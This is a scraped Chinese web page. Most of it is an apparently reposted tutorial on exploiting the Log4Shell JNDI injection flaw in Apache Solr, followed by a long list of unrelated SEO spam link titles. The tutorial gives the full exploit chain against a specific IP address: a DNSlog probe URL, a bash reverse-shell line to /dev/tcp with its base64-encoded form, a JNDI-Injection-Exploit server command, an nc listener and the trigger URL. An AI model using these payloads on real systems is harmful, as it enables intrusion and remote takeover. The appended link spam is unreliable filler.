当前位置: 首页 > wzjs >正文

最好的网站制作公司上海的公司排行榜

最好的网站制作公司,上海的公司排行榜,江门提供网站制作平台,江苏企业网站建设公司在dns.log生成一个网址 将得到的网址上传上去 http://39.105.61.160:8983/solr/admin/cores?action${jndi:ldap://${sys:java.version}.6tioul.dnslog.cn} 得到回显,表示操作已执行,证明漏洞存在 在云服务器上构建恶意的类 将要执行的恶意操作的代码进…

 在dns.log生成一个网址

 将得到的网址上传上去

http://39.105.61.160:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.6tioul.dnslog.cn}

 得到回显,表示操作已执行,证明漏洞存在

 在云服务器上构建恶意的类

将要执行的恶意操作的代码进行base64编码

bash -i>& /dev/tcp/39.105.61.160/8888 0>&1

 将代码放到云服务器执行

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaT4mIC9kZXYvdGNwLzM5LjEwNS42MS4xNjAvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" -A "39.105.61.160"

再开一个云服务器,监听8888端口 

nc -lvvp 8888

 

 将此代码送去执行

http://39.105.61.160:8983/solr/admin/cores?action=${jndi:rmi://38.105.61.160:1099/1v8x0q}

 之后再监听的云服务器得到消息,完成反弹shell

http://www.dtcms.com/wzjs/572900.html

相关文章:

  • 健身网站开发可行性分析微盟小程序模板
  • 黄金网站app大全西装定制
  • 计算机前端seo软件工具
  • design设计网站app制作平台下载
  • 网站如何维护在线一键生成网页
  • 网站后台密码忘了怎么办梧州网站建设
  • 怎么优化推广自己的网站枸橼酸西地那非片
  • 蚌埠网站设计需要网站开发
  • 本地网站建设信息大全制作化妆品网站
  • c语言可以做网站吗衡器行业网站建设模板
  • 企业网站的作用有哪些青岛网站排名哪家公司好
  • 怎样与其它网站做友情链接成免费crm软件app
  • 网站后台更新没有变化有哪些好的做兼职的网站
  • wordpress建影视网站商城网站建设哪家最好
  • 义乌建设局网站宜兴网站设计
  • 网站如何增加增删查改怎么做苏州网站建设与网络推广
  • 教做家常菜的网站乐清企业网站建设
  • 服务好的徐州网站建设乡土文化网站怎么做
  • 电子商务网站建设第二版论文建立微信群怎么建
  • 网站建设公司发展海报在线设计生成器
  • 网站开发 证书wordpress 百度蜘蛛
  • 如何 做网站做美食网站的模板
  • 不会代码可以做网站维护吗网红网站建设官网
  • 专业品牌网站建设价格百度推广获客方法
  • 怎么在网站添加关键词上海百度竞价点击软件
  • 网站建设与推广策划案案例网站建设进度表 下载
  • 牡丹江市西安区建设局网站用php做的大型网站有哪些
  • 手机网站建设图做公司企业网站标准尺寸
  • 网站的文件夹结构做个简单网站大概多少钱
  • 怎么用linux做网站建设网站宽度最好是多少钱